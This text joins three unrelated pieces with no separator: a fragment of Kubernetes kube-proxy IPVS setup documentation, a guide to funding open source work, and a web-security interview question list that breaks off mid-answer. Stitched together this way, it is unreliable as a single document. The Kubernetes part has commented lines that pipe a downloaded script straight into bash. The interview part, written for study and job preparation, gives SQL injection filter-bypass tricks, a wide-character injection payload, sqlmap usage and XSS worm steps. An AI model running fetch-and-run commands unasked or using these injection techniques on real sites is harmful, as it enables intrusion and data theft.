ip_vs_sh modprobe -- nf_conntrack_ipv4 # to check loaded modules, use lsmod | grep -e ip_vs -e nf_conntrack_ipv4 # or cut -f1 -d " " /proc/modules | grep -e ip_vs -e nf_conntrack_ipv4 ``` Packages such as `ipset` should also be installed on the node before using IPVS mode. Kube-proxy will fall back to IPTABLES mode if those requirements are not met. ### Local UP Cluster Kube-proxy will run in IPTABLES mode by default in a [local-up cluster](https://github.com/kubernetes/community/blob/master/contributors/devel/running-locally.md). To use IPVS mode, users should export the env `KUBE_PROXY_MODE=ipvs` to specify the IPVS mode before [starting the cluster](https://github.com/kubernetes/community/blob/master/contributors/devel/running-locally.md#starting-the-cluster): ```shell # before running `hack/local-up-cluster.sh` export KUBE_PROXY_MODE=ipvs ``` ### GCE Cluster Similar to local-up cluster, kube-proxy in [clusters running on GCE](https://kubernetes.io/docs/getting-started-guides/gce/) run in IPTABLES mode by default. Users need to export the env `KUBE_PROXY_MODE=ipvs` before [starting a cluster](https://kubernetes.io/docs/getting-started-guides/gce/#starting-a-cluster): ```shell #before running one of the commands chosen to start a cluster: # curl -sS https://get.k8s.io | bash # wget -q -O - https://get.k8s.io | bash # cluster/kube-up.sh export KUBE_PROXY_MODE=ipvs ``` ### Cluster Created by Kubeadm If you are using kubeadm with a [configuration file](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-init/#config-file), you have to add `mode: ipvs` below the `kubeProxy` field as part of the kubeadm configuration. ```yaml ... kubeProxy: config: mode: ipvs ... ``` before running `kubeadm init --config <path_to_configuration_file>` to specify the ipvs mode before deploying the cluster. **Notes** If ipvs mode is successfully on, you should see IPVS proxy rules (use `ipvsadm`) like ```shell # ipvsadm -ln IP Virtual Server version 1.2.1 (size=4096) Prot LocalAddress:Port Scheduler Flags -> RemoteAddress:Port Forward Weight ActiveConn InActConn TCP 10.0.0.1:443 rr persistent 10800 -> 192.168.0.1:6443 Masq 1 1 0 ``` or similar logs occur in kube-proxy logs (for example, `/tmp/kube-proxy.log` for local-up cluster) when the local cluster is running: ``` Using ipvs Proxier. ``` While there is no IPVS proxy rules or the following logs occurs indicate that the kube-proxy fails to use IPVS mode: ``` Can't use ipvs proxier, trying iptables proxier Using iptables Proxier. ``` See the following section for more details on debugging. ## Debug ### Check IPVS proxy rules Users can use `ipvsadm` tool to check whether kube-proxy are maintaining IPVS rules correctly. For example, we have the following services in the cluster: ``` # kubectl get svc --all-namespaces NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE default kubernetes ClusterIP 10.0.0.1 <none> 443/TCP 1d kube-system kube-dns ClusterIP 10.0.0.10 <none> 53/UDP,53/TCP 1d ``` We may get IPVS proxy rules like: ```shell # ipvsadm -ln IP Virtual Server version 1.2.1 (size=4096) Prot LocalAddress:Port Scheduler Flags -> RemoteAddress:Port Forward Weight ActiveConn InActConn TCP 10.0.0.1:443 rr persistent 10800 -> 192.168.0.1:6443 Masq 1 1 0 TCP 10.0.0.10:53 rr -> 172.17.0.2:53 Masq 1 0 0 UDP 10.0.0.10:53 rr -> 172.17.0.2:53 Masq 1 0 0 ``` ### Why kube-proxy can't start IPVS mode Use the following check list to help you solve the problems: **1. Specify proxy-mode=ipvs** Check whether the kube-proxy mode has been set to `ipvs`. **2. Install required kernel modules and packages** Check whether the IPVS required kernel modules have been compiled into the kernel and packages installed. (see Prerequisite)
# A handy guide to financial support for open source. *"I do open source work, how do I find funding?"* This document aims to provide an exhaustive list of all the ways that people get paid for open source work. Hopefully, projects and contributors will find this helpful in figuring out the best options for them. The list below is roughly ordered from small to large. Each funding category links to several real examples (using topical articles or pages wherever possible instead of just a project's homepage.) The categories are not mutually exclusive. For example, a project might have a foundation but also use crowdfunding to raise money. Someone else might do consulting and also have a donation button. Etc. --- # Table of Contents 1. [Donation button](#donation-button) 2. [Bounties](#bounties) 3. [Sponsorware](#sponsorware) 4. [Crowdfunding (one-time)](#crowdfunding-one-time) 5. [Crowdfunding (recurring)](#crowdfunding-recurring) 6. [Books and merchandise](#books-and-merchandise) 7. [Advertising & sponsorships](#advertising--sponsorships) 8. [Get hired by a company to work on project](#get-hired-by-a-company-to-work-on-project) 9. [Start a project while currently employed](#start-a-project-while-currently-employed) 10. [Grants](#grants) 11. [Consulting](#consulting) 12. [Paid support](#paid-support) 13. [SaaS](#saas) 14. [Copyleft + paid license](#copyleft--paid-license) 15. [Open core](#open-core) 16. [Foundations & consortiums](#foundations--consortiums) 17. [Venture capital](#venture-capital) 18. [Restricted license](#restricted-license) APPENDIX: [Contributing to this guide](#contributing-to-this-guide) // [License & attribution](#license-and-attribution) TRANSLATIONS: [Traditional Chinese(繁體中文)](https://github.com/jserv/lemonade-stand) // [Simplified Chinese(簡體中文)](https://github.com/wizicer/FinancialSupportForOpenSource) // [Italian(italiano)](https://github.com/dakk/lemonade-stand) // [Japanese(日本語)](https://github.com/fumikito/lemonade-stand) // [Russian(русский)](https://github.com/saviorand/lemonade-stand_ru) **"personal effort" notes when a funding effort was led by an individual, not a project* ## Donation button *Stick a donation button on your site. Stripe and PayPal are examples of services you can use to accept donations.* #### Pros * Few strings attached * Little work involved: "set it and forget it" #### Cons * Usually not much money unless you have dedicated fundraising efforts * Need an entity to accept donations, which may take a fee for doing so. Examples are Stripe and PayPal. * To make donations tax-free for the person/organization who is donating, may need a legally charitable entity (in the United States, a 501(c)(3) nonprofit entity) to accept donations. [Software Freedom Conservancy](https://sfconservancy.org) and [NumFOCUS](https://www.numfocus.org) are examples. Harder for individuals or international donations to manage * Sometimes not clear who “deserves” money in a project or how it gets distributed. An entity like [OpenCollective](http://opencollective.com) may help with this. #### Case Studies * [ChatSecure](https://chatsecure.org/blog/sustainable-open-source-starts-with-you/) * [Git](https://git-scm.com/sfc) * [Transmission](https://www.transmissionbt.com/) * [Twisted](https://twistedmatrix.com/trac/wiki/WhyDonate) ## Bounties *Sometimes, projects or companies post bounties for open source work (ex. "fix this bug and collect $100"). There are several websites, listed below, that help facilitate the posting and collection of bounties.* #### Pros * Open to community participation * Money is tied to doing specific work (more like paying for service than donations) * Especially popular for security work #### Cons * Can create perverse incentives in a project (low quality PRs, distracting priorities) * Conflicts can arise over whether work fulfills a bounty * Usually not much money per bounty (~<$500) * Doesn’t provide recurring revenue #### Case Studies * [Bountysource](http://bountysource.com) * [Gitcoin](https://gitcoin.co/explorer) * [GitHub Bug Bounty Program](https://bounty.github.com/) * [Google Patch Rewards](https://www.google.com/about/appsecurity/patch-rewards/) * [Inkscape's "funded development" system](https://inkscape.org/support-us/funded-development/) * [Internet Bug Bounty](https://internetbugbounty.org/) * [IssueHunt](https://issuehunt.io) * [The Bounties Network](https://www.bounties.network/) ## Sponsorware *If you'd like to open source a project but want to ensure that others will invest in its long-term maintenance, you could tell your community that you'll open source the project once you've hit a certain amount of sponsorship. (Writer Tim Carmody refers to this as ["unlocking the commons."](https://www.niemanlab.org/2019/01/unlocking-the-commons/))* *This is similar to [Crowdfunding (one-time)]((#crowdfunding-one-time)) described below, except that instead of funding the work in advance, you build the software from the get-go, then choose whether or not to open source it depending on whether you hit your goal.* #### Pros * Can be recurring source of revenue after initial development, depending on how you set up the conditions of releasing the project * It can be a useful signal as to whether people value the package * Gives people immediate value – people can sponsor you and get access to the package right away * Doesn’t restrict future potential growth of the project and upholds the spirit of open source #### Cons * Doesn't work for projects that are already released * Likely only works for eye-catching projects where a demo or proof-of-concept is very exciting #### Case Studies * [Caleb Porzio's `sushi` package](https://calebporzio.com/sponsorware) ## Crowdfunding (one-time) *If you have a specific idea you'd like to implement (rather than ongoing project work), a one-time crowdfunding campaign can help raise the funds you need. Both individuals and companies might be willing to donate to your campaign.* #### Pros * Few strings attached * Can be easier for an individual to legally manage via, e.g. [Kickstarter](https://kickstarter.com/) #### Cons * Lots of work involved to market campaign * Usually has to be tied to concrete outcome, perks * Usually not that much money (~$50K for one time) * Companies not always comfortable donating to campaigns #### Case Studies * [Andrew Godwin + Django (personal effort)](https://www.kickstarter.com/projects/andrewgodwin/schema-migrations-for-django) * [Dave Gandy + Font Awesome](https://www.kickstarter.com/projects/232193852/font-awesome-5) * [GDAL Coordinate System Barn Raising](https://gdalbarn.com/) * [Michal Papis + Rvm (personal effort)](https://www.bountysource.com/teams/rvm/fundraiser) * [Monero Community Crowdfunding System (CCS)](https://ccs.getmonero.org/) * [RESTful WP-CLI](https://poststatus.com/kickstarter-open-source-project/) ## Crowdfunding (recurring) *If you'd like to fund ongoing project work, you can set up a recurring crowdfunding campaign, with a monthly or annual financial commitment that renews indefinitely (or until the donor cancels). Those who use your project regularly (including both individuals and companies) might be willing to fund your work.* #### Pros * Few strings attached * Can be easier for an individual to legally manage via, e.g. [Patreon](https://patreon.com), [Salt](https://salt.bountysource.com/), [Liberapay](https://liberapay.com/), [OpenCollective](https://opencollective.com), [Flattr](https://flattr.com/) #### Cons * Harder to get commitments to recurring donations (often requires preexisting brand/reputation) * Harder to explain concrete outcomes, perks that come with recurring donations * Usually not that much money (~$1-4K monthly) * Companies not always comfortable donating to campaigns #### Case Studies * [Babel](https://opencollective.com/babel) * [Caleb Porzio + Laravel Livewire and more](https://calebporzio.com/i-just-hit-dollar-100000yr-on-github-sponsors-heres-how-i-did-it) * [Clojurists Together](https://clojuriststogether.org) * [Eran Hammer + hapi Patreon](https://www.patreon.com/eranhammer) * [ESLint](https://eslint.org/blog/2019/02/funding-eslint-future) * [Evan You + Vue.js Patreon](https://www.patreon.com/evanyou) * [GnuPG](https://www.gnupg.org/donate/index.html) * [Ruby Together](https://rubytogether.org) * [Tom Christie + Django REST framework (personal effort)](https://fund.django-rest-framework.org/topics/funding/) * [webpack](https://opencollective.com/webpack) ## Books and merchandise *If you are an expert in a domain that other people might find useful to learn about, you could write and sell a book or series of books. You can find a publisher (like O'Reilly) or self-publish. In addition to selling books, some projects sell merchandise (ex. shirts, hoodies) to support their work.* #### Pros * Outcome not tied to project work itself, so you retain creative freedom * Can serve as marketing for the project itself * Can be recurring source of revenue after initial development #### Cons * Often not a significant source of revenue * Can distract from core development of project * Merchandise can have upfront costs #### Case Studies * [CocoaPods (fundraising for charity)](https://cocoapods.org/socks) * [Daniel and Audrey Roy Greenfeld + Two Scoops of Django (personal effort)](https://www.twoscoopspress.com/products/two-scoops-of-django-1-8) * [Kyle Simpson + You Don't Know JS (personal effort)](https://github.com/getify/You-Dont-Know-JS) * [Lua](https://www.lua.org/pil/) * [Sandi Metz + Practical Object-Oriented Design in Ruby (personal effort)](http://www.poodr.com/) ## Advertising & sponsorships *If your project has a large audience, you can sell sponsorships to advertisers who might want to reach them. You probably have a very targeted audience (ex. if you have a Python project, you can assume your audience is likely people who are technically familiar with Python), so use that to your advantage.* #### Pros * Business model aligned with something people are willing to pay for #### Cons * Need large enough audience to justify sponsorships * Need to manage trust and transparency with user base (ex. no tracking) * Can be a lot of work to find and manage clients * Can involve ethical concerns about marketing * Can introduce a conflict of interest; making controversial changes could result in losing sponsors/advertisers #### Case Studies * [CodeFund](https://codefund.io) * [GitFund](https://gitfund.io) * [Hoodie](http://hood.ie/sponsoring/) * [Read the Docs](http://blog.readthedocs.com/ads-on-read-the-docs/) * [Feross's experiment with StandardJS](https://feross.org/funding-experiment-recap/) * Kite sponsorship of Minimap ([summary](https://medium.com/@nayafia/the-kite-debacle-is-democracy-at-work-6a04bc043c50)) * [Caddy](https://github.com/caddyserver/caddy) (exclusively sponsorships) ## Get hired by a company to work on project *Companies sometimes hire individuals to do open source work. Find a company that uses the project you want to work on. Often this is a split arrangement (ex. 50% company work, 50% open source work). Alternatively, if you have an idea for a new project, find a company that would be interested in using what you produce. In these situations, having demonstrated experience you can point to will be very helpful.* #### Pros * Taps into those who have resources (i.e. companies) * Can be well-aligned with company needs * Steady income #### Cons * Usually involves “getting lucky”: no clear, repeatable path to finding this arrangement * Project already needs to be well-known and used * Person not contributing to company’s bottom line, which makes them expendable * Governance issues, company could have undue influence over project * Can affect project dynamics + balance #### Case Studies * [Aaron Patterson + ManageIQ and Ruby, Rails (personal effort)](http://community.redhat.com/blog/2014/09/tenderlove-joins-manageiq/) * [Donald Stufft + Hewlett-Packard and Python packaging (personal effort)](https://twitter.com/dstufft/status/594119386333609984) * [Rich Hickey + Cognitect and Clojure](http://www.bizjournals.com/triangle/news/2013/09/17/durhams-relevance-to-merge-with.html?full=true) * [Ryan Dahl + Joyent and Node.js (opens a YouTube video) (personal effort)](http://www.youtube.com/watch?v=SAc0vQCC6UQ&t=29m20s) ## Start a project while currently employed *Many open source projects started as employee side projects. The project might eventually outgrow the company, but starting it as a side project can be a great way to incubate the idea.* *If you pursue this path, make sure you understand your company's policy on open source work. Some companies encourage employees to contribute to open source during working hours. Some might treat your open source work as a company project. Don't assume anything; ask someone at your company before starting.* #### Pros * Freedom to test new ideas without worrying about salary * Can be well-aligned with company needs * Suitable for newer, experimental ideas #### Cons * Need to do it as a side project or be approved to work on it during salaried time * Risk of undue company influence * Can lead to complicated governance later down the line #### Case Studies * [Facebook and React](https://www.quora.com/How-was-the-idea-to-develop-React-conceived-and-how-many-people-worked-on-developing-it-and-implementing-it-at-Facebook/answer/Bill-Fisher-17) * [Futurice's open source program](http://futurice.com/blog/sponsoring-free-time-open-source-activities) * [Google and Go](https://golang.org/doc/faq#history) * [Mozilla and Rust](https://prev.rust-lang.org/en-US/faq.html#is-this-project-controlled-by-mozilla) * [Formidable's Sauce program](https://formidable.com/blog/2019/sauce-program/), where they pay employees for their open source contributions ## Grants *Grants are monetary gifts that do not require repayment. Oftentimes the grantmaker receives other benefits from giving you the grant, such as access to you, demonstration of impact, a report of your work, or tax benefits.* *Grants can come from many places, including companies, software foundations, philanthropic foundations, and the government. The technical and legal aspects of a grant vary greatly depending on where it comes from. For example, a company might give you a "grant" but legally treat it as a consulting invoice. A philanthropic foundation can only make grants to nonprofits, so you would need to be a nonprofit yourself, or (more commonly) find a nonprofit to sponsor you. If you're unfamiliar with grants, the best way to understand how grants work is to talk to someone who has received one before. Some examples of grant recipients are listed below.* #### Pros * Fewer strings attached * Guaranteed money can help project focus for an unbroken period of time * Gives project room to breathe and experiment #### Cons * There aren’t many software-related grantmakers (philanthropic, gov’t, corporate) * Grants are finite. Still need to find sustainability beyond the life of a grant #### Case Studies * [Andrey Petrov + Stripe Open-Source Retreat and urllib3](https://medium.com/@shazow/urllib3-stripe-and-open-source-grants-edb9c0e46e82#.45ylnxrh4) * [Chan-Zuckerberg Initiative grant program for open source software in science](https://chanzuckerberg.com/rfa/essential-open-source-software-for-science/) * [Dash Budget Proposal Tracker](https://dashvotetracker.com/) * [Dat Project](https://blog.datproject.org/2017/09/15/dat-funding-history/) * [Django + Mozilla Open Source Support](https://www.djangoproject.com/weblog/2015/dec/11/django-awarded-moss-grant/) * [Grin General Fund](http://grin-tech.org/funding.html) * [Handshake community grant program](https://handshake.org) * [Libraries.io grant applications](https://github.com/librariesio/supporters) * [ralphtheninja/open-funding](https://github.com/ralphtheninja/open-funding#grants) has a list of grants * [Segment Open Fellowship](https://segment.com/blog/segment-open-fellowship-2017/) * [Sentry Open Source Grant](https://blog.sentry.io/2019/01/29/apply-sentry-open-source-grant) ## Consulting *Consulting can be a flexible way to fund open source work. You have more freedom to structure your time as you wish (for example, consulting 30 hrs of the week and spending 10 hrs of the week on open source work). Consultants can usually charge more for their time than salaried employees because the work is less steady, they don't receive benefits, etc. If you plan on doing this type of work regularly, you will probably want to set up an LLC (or equivalent outside of the US).* *If your project is popular, you can also offer consulting & services around the project itself. For example, a client might pay you to implement the project for them, build something custom, or train them on how to use it.* #### Pros * Business model aligned with something people are willing to pay for #### Cons * Consulting requires human power, doesn’t scale well (except for rare outliers) * Business needs can distract from writing code or other tasks related to the project itself * Can be at odds with making software simple to use * Project needs to be sufficiently popular that people are willing to pay for related services #### Case Studies * [Baroque Software](http://baroquesoftware.com/) * [Neighbourhoodie](https://neighbourhood.ie/) * [OpenSSL Software Foundation](https://www.openssl.org/community/contacts.html) formerly [OpenSSL Software Services](https://web.archive.org/web/20180817114118/opensslservices.com/what.html) * [Varnish Moral License](http://phk.freebsd.dk/VML/) ## Paid support *In this model, the code is freely available, but users need to pay to receive support from the project's maintainers. That might mean charging for access to the issue tracker, office hours, a community Slack, or an SLA (service-level agreement).* #### Pros * Business model aligned with something people are willing to pay for #### Cons * Can be at odds with making software simple to use * Project needs to be sufficiently popular that people are willing to pay * Maintainers don't necessarily want to offer professional support #### Case Studies * [Fody](https://github.com/Fody/Fody/blob/master/readme.md): Must be a Patreon supporter to open an issue or pull request * [Prism](https://www.patreon.com/prismlibrary): Supporting their Patreon gives you access to their community Slack channel for project support * [Red Hat](https://en.wikipedia.org/wiki/Red_Hat#Business_model) * [Tidelift paid subscriptions](https://tidelift.com/subscription) ## SaaS *SaaS means [Software as a Service](https://en.wikipedia.org/wiki/Software_as_a_service). In this model, the codebase itself can remain open source, but you offer paid services such as charging for use of a main hosted site or for handling the hosting of dedicated instances for customers. Typically, paying customers also get priority support.* #### Pros * Can build community around open project and make money off of services for hosting * Allows open source project to focus on users and as needs grow to help enterprises adopt the project * Can scale by number of users #### Cons * Often means the hosting needs to be cheaper than hiring a dev to run the project for you. * “Two tiers” of product support can make free users unhappy #### Case Studies * [Discourse](https://www.discourse.org/) * [Forge Laravel](https://forge.laravel.com/) * [Ghost](https://ghost.org/about/) * [GitLab](https://gitlab.com) (also uses open core licensing) * [Moodle](https://moodle.org/) * [Sentry](https://getsentry.com/) * [Travis CI](https://travis-ci.org/) * [WordPress.com](http://wordpress.com/) ## Copyleft + paid license *Companies selling proprietary software prefer to include permissively licensed code (such as MIT or Apache 2.0) rather than copyleft licensed code (like the GPL) in their software, because the latter requires them to keep the same copyleft terms for their end products. So, some open source projects use a copyleft license by default, but they sell license exceptions, proprietary licenses, or permissive commercial licenses to companies who want to bypass the copyleft requirements.* #### Pros * Business model aligned with something people are willing to pay for * Can scale well if successful #### Cons * Can be at odds with making software freely accessible * Project needs to be big enough that customer need exists * Only works for upstream software that's being used in downstream software * There can be legal or monetary barriers to moving code from open to proprietary #### Case Studies * [Metafizzy](https://metafizzy.co) (ex. [Isotope](https://isotope.metafizzy.co/license.html), [Flickity](https://flickity.metafizzy.co/license.html)) * [MySQL](http://www.mysql.com/about/legal/licensing/oem/) * [Qt](https://www1.qt.io/faq/#_Toc_3) * [SQLite](https://www.sqlite.org/copyright.html) ## Open core *Under an [open core](https://en.wikipedia.org/wiki/Open_core) model, some aspects of the project are free, but other features are proprietary and available only to paid users. Usually this works when there is enterprise demand for the project.* #### Pros * Business model aligned with something people are willing to pay for * Can scale well if successful #### Cons * Need to have something you can charge for (which means making certain features exclusive) * Can be at odds with making software freely accessible * “Two tiers” of product support can make free users unhappy * May require a CLA (Contributor License Agreement) in order to accept code submissions from outside contributors while retaining the ability to relicense those submissions under the proprietary license #### Case Studies * [GitLab](https://about.gitlab.com/) * [Docker](https://www.docker.com/) * [Elastic](https://www.elastic.co/) * [Mesosphere](https://mesosphere.com/) * [Phusion Passenger](https://www.phusionpassenger.com/); see also their talk, ["Bootstrapping a Business Around Open Source"](https://www.youtube.com/watch?v=uHaMpLyMOL0&feature=youtu.be) (video) * [Sidekiq](http://sidekiq.org/) ## Foundations & consortiums *A [foundation](https://en.wikipedia.org/wiki/Foundation_(nonprofit)) is a legal entity that can accept and/or disburse donations. Because their purpose is not to make profits, they can be a great choice to signal neutrality and steward a project. In the US, foundations are either 501(c)(3) (nonprofit) or 501(c)(6) (trade consortium). Many software foundations are 501(c)(6) because 501(c)(3) require demonstrating a charitable purpose, which can be more difficult in software.* #### Pros * Neutrality. Foundation protects the code and helps steward community * Influence distributed across multiple donors * Can legitimize project, companies might feel more comfortable giving to foundations than individuals #### Cons * Only really worth it for big projects * Difficult to set up for IRS reasons (many do 501(c)(6) instead of 501(c)(3)), restrictions on what you can do * Requires serious community effort and diverse skills (you still need to fundraise after setting up the entity!) #### Case Studies * [Linux Foundation](https://www.linuxfoundation.org/) * [Node.js Foundation](https://www.sitepoint.com/goodbye-joyent-hello-node-js-foundation/) * [Python Software Foundation](https://www.python.org/psf/) * [Ruby Together](http://rubytogether.org/) * [Signal Foundation](https://signal.org/blog/signal-foundation/) ## Venture capital *Venture capital is a form of funding for high growth businesses. Unlike a bank loan or other forms of debt financing, venture capitalists take equity (a percent ownership in your business) in exchange for funding. Unlike taking out a loan, you don't have to repay your creditors if your business tanks. If you do succeed, however, you should expect to return capital to your investor at a multiple.* *Venture capital is "high risk high reward": VCs are more risk tolerant than banks, but they also expect a large payoff if you are successful. If you plan on raising venture capital, you should set up a business entity structured as a C Corp, preferably in Delaware. If you're unfamiliar with the venture capital process, the best place to start is by reaching out to similar founders who have successfully raised venture.* #### Pros * Institutional support can be helpful for growing a business * Large amounts of capital available #### Cons * Venture capital comes with expectations of an exit (i.e. returning the money to investors at a multiple). History suggests this is structurally difficult to achieve for open source businesses. Venture Capital isn't actually a business model but only investment capital for those who have some *other* business model for future revenue. * Venture capital can change motivations and distract from priorities * Unavailable to non-profits #### Case Studies * [Confluent](http://www.confluent.io/blog/confluent-raises-a-series-b-funding) * [Gatsby](https://www.gatsbyjs.org/blog/2018-05-24-launching-new-gatsby-company/) * [Meteor](http://info.meteor.com/blog/announcing-our-20m-series-b-funding) * [NodeSource](https://techcrunch.com/2015/02/09/nodesource-raises-3-million-to-build-new-programming-tools/) * [Npm](http://blog.npmjs.org/post/76320673650/funding) * [OSS Capital](https://oss.capital/) ## Restricted license *Restricted licenses (reminiscent of the older [shareware](https://en.wikipedia.org/wiki/Shareware) movement) are **not open source** because they do not meet [the definition](https://en.wikipedia.org/wiki/The_Open_Source_Definition) of an open source license. The source code is made available (either publicly, or to customers who pay for a license), but they may limit the freedoms to redistribute and modify or to use the software commercially.* #### Pros * Business model aligned with something people are willing to pay for * Potential to scale well if successful #### Cons * Not actually open source (so may fail to achieve many or most of the benefits of open source) * Can be controversial, erode community trust #### Case Studies * [BSL (Business Source License)](https://mariadb.com/bsl-faq-adopting), used by [MariaDB](https://mariadb.com/) * [Fair Source](https://fair.io/), used by [Sourcegraph](https://sourcegraph.com/) * [License Zero](https://medium.com/licensezero/the-license-zero-manifesto-fecb7aaf4c0a) * [Markdown Monster](https://markdownmonster.west-wind.com/) * Source code is viewable, but [a license must be purchased](https://markdownmonster.west-wind.com/download.aspx) for continued use * Project contributors are [eligible for a free license](https://markdownmonster.west-wind.com/download.aspx#Contribute) * [Onivim 2](https://github.com/onivim/oni2#license) * Commercial license is pay-what-you-want, with the minimum pre-order price increasing as they get closer to shipping an MVP * Anyone who financially sponsors the OSS project gets a free lifetime license * Commits are dual-licensed with MIT after 18 months from commit's date to master * [Redis Commons Clause](https://redislabs.com/community/licenses/) * [Ungit switched back from Faircode to MIT License](https://github.com/FredrikNoren/ungit/issues/997) --- ### Contributing to this guide I wrote up this guide to aggregate my own knowledge. I recognize the pros/cons are somewhat subjective, but they reflect my views. If you submit changes, I may consider them but do not intend to cover everyone's viewpoints. If something is factually incorrect (especially with a case study example), I welcome your edits. Case studies are organized alphabetically within each category. Also, if there's a category you know of that I missed, I would also welcome that addition. ### License and attribution This guide is available under the Creative Commons CC0 1.0 License, meaning you are free to use it for any purpose, commercial or non-commercial, without any attribution back to me (public domain). If you do use it, I'd love to hear about it! (Find me here: [@nayafia](http://twitter.com/nayafia)) But you are in no way required to do so.
# web-sec-interview Information Security Industry Practitioners (Web Security / Penetration Testing) Interview Questions 1.1 ### README English | [中文](README_CN.md) --- * Introduce the experience of burrowing (or CTF experience) that you think is interesting * What are the more vulnerabilities you usually use? The principle of related vulnerabilities? And a fix for the vulnerability? * What tools do you usually use and the characteristics of the corresponding tools? * How to do sql injection / upload Webshell if you encounter waf? Please write the process of bypassing WAF (SQLi, XSS, upload vulnerability) Refer to the following three <a href="https://xz.aliyun.com/t/265/">My Way of WafBypass (SQL Injection)</a><br /> <a href="https://xz.aliyun.com/t/337/">My Way of WafBypass (Upload)</a><br /> <a href="https://xz.aliyun.com/t/265/">My Way of WafBypass (Misc)</a><br /> * Talk about the idea of ​​lifting the rights of Windows system and Linux system? * List all high-risk vulnerabilities of open source components that you know (more than ten) * Describe a CVE or POC that you have studied in depth. * SQLi * How to judge sql injection, what are the methods? > Add single quotes, double quotes, order by, rlike, sleep, benchmark, operator, modify data type, error injection statement test * Introduce the cause of SQL injection vulnerabilities, how to prevent it? What are the injection methods? In addition to database data, what are the ways to use it? * The principle of wide character injection? How to use the wide character injection vulnerability, how to construct and repair the payload? > Popularly speaking, gbk, big5 and other codes account for two bytes. After the sql statement enters the backend, the single quotes are escaped. The escaped \ is %5C, and the current %xx and %5C can be combined into two. When the characters are in bytes, the subsequent single quotes can escape, resulting in injection. More common gbk, %df' => %df%5c%27 => 运'. Already single quotes, the rest is almost the same as normal injection. > Fix the way by setting the MYSQL database character set utf8mb4, PHP character set utf-8. * You all know which sql pass skills > This is too much, a lot of online search. Mainly depends on the filtering and protection of the target site. Common bypass can be /**/ replace spaces, /*!00000union*/ is equal to union, or use front-end filtering, add angle brackets <>. Cases are too common. If you filter functions or keywords, you can try other equivalent functions that can achieve results. Keywords such as or 1=1 can be replaced with ||1, or with operators such as /, %. The same effect. In short, still look at the requirements. * How does sqlmap inject an injection point? > If it is get type, directly, sqlmap -u "injection point URL". > > If it is post type, you can sqlmap -u "injection point URL" -data="post parameter" > > If it is a cookie type, X-Forwarded-For, etc., when you can access it, use Burpsuite to capture the package, replace it with the * mark, put it in the file, and then sqlmap -r "file address" * mysql website injection, what is the difference between 5.0 and below? > Below 5.0, there is no information_schema system table, can not list names, etc., can only violently run table names. > 5.0 is multi-user single operation, 5.0 or more is multi-user and multi-operation. * mysql injection point, use the tool to write a sentence directly to the target station, what conditions are needed? > root permissions and the absolute path to the site. * There is a sql injection vulnerability in the following link. What ideas do you have for this variant injection? > demo.do?DATA=AjAxNg== * Found demo.jsp?uid=110 injection point, what kinds of ideas do you have to get webshell, which is the best? * Domain * Explain the same-origin policy > If the protocol of the two pages, the port and the domain name are the same, it can be considered to be homologous. * The same-origin strategy, those things are acquired by homology > read cookies, LocalStorage and IndexDB > read DOM elements > Send an AJAX request > * If the subdomain and the top-level domain have different sources, where can I set them to be homologous? > Probably the same subdomain, the main domain has different meanings, you can solve the cross-domain by setting document.domain in both rooms. * How to set up data that can be requested across domains? What does jsonp do? > When the primary domain is the same, cross-domain, you can set document.domain as above. > > When the primary domain is different, you can set up CORS on the server to make cross-domain requests through jsonp and websocket. H5 added the window.postMessage method to resolve cross-domain requests. > > Request json data via <script> like server, not subject to the same-origin policy. * What is the business meaning of jsonp? * Ajax * Does Ajax follow the same-origin policy? > The full name of ajax is Asynchronous JavaScript and XML, asynchronous javascript and XML technology. Follow the same-origin policy, but can be circumvented by jsonp, etc. * How to use JSON injection? > XSS cross-site attack * What is the difference between JSON and JSONP? * JSONP hijacking utilization and repair plan? * Browser strategy * What are the security policies between different browsers, such as chrome, firefox, IE > All three browsers follow the same-origin policy, Content Security Policy (CSP), Cookie Security Policy (httponly, Secure, Path) * What is CSP? How to set up CSP? > CSP: Content Security Policy, content security policy. It is a security mechanism for breeding XSS attacks. The idea is to configure trusted content sources in the form of server whitelists, which can be used by client web application code. * XSS * What is XSS and how is it repaired? > XSS is a cross-site scripting attack, in which data submitted by users can be constructed to execute, thus stealing user information and other attacks. Fixing method: Escape character entities, use HTTP Only to prohibit JavaScript from reading cookie values, check on input, and use the same character encoding for browser and web application. * What happened to xss? > Personal understanding is to safely filter the data submitted by the user and then directly input into the page, causing the execution of the js code. As for the specific scene, there is a risk that the output may be affected by xss. * XSS persistence? * If you are given an XSS vulnerability, what additional conditions do you need to construct a worm? > XSS worm: XSS attacks can cause mutual infections among users in the system, causing the entire system user to fall, and the XSS vulnerability that can cause this harm becomes an XSS worm. > > 1. Construct a self-replicating reflective XSS > > 2, insert comments, message box > > 3. The user clicks on the link and the link content points to the same XSS vector. That is, the page of the stored type xss injected into the worm code. When the link is clicked, it will continue to cause the worm to spread. * Where can a worm appear on social networking sites? >Message Board/Comment/Article Post/Private Message... * If you are called to defend against worms, what methods do you have? > 1. Change the name of the local destructive program. 2. Close the executable file. 3. Prohibit "FileSystemObject" to effectively control the spread of VBS virus. Specific operation method: Use regsvr32 scrrun.dll /u this command to disable file system objects. 4. Open the browser's security settings. * If you are given an XSS blind hit vulnerability, but the information returned shows that his background is on the intranet and can only be accessed using intranet, how do you use this XSS? > github has some ready-made xss scripts for scanning intranet ports, which can be used for reference, and then further utilized according to the detected information, such as opening redis, etc., and then using the vulnerability to getshell. * How to prevent XSS vulnerabilities, how to do it in the front end, how to do it in the back end, where is better, and why? * How does the black box detect XSS vulnerabilities? * CRLF injection * Principle of CRLF injection > CRLF is the abbreviation for carriage return + line feed. I have encountered relatively few, and I have never dug through such a hole. In short, it is generally possible to control the response of the server by submitting a malicious data containing a carriage return and a line feed. I have encountered potential CRLF after submitting a carriage return and a new line. The use of CRLF can be XSS, malicious redirect location, and set-cookie. * CSRF * What is CSRF? How to fix it? > CSRF is a cross-site request forgery attack. XSS is one of many means of implementing CSRF because there is no confirmation that the user is voluntarily initiated when the critical operation is performed. Fix: Filter out the pages that need to be protected and embed the Token, enter the password again, and verify the Referer. * What is the nature of the CSRF vulnerability? > CSRF is a cross-site request forgery that sends a request to the server as a victim. In essence, the individual feels that the server does not check the identity of the user who submitted the operation while performing some sensitive operations. * What are the methods to defend against CSRF? How does JAVA defend against CSRF vulnerabilities? Is token useful? > Defense CSRF is generally plus referer and csrf_token. > For details, please refer to this <a href="https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/index.html">CSRF attack response to CSRF attacks</a> * What is the difference between CSRF, SSRF and replay attacks? > CSRF is a cross-site request forgery 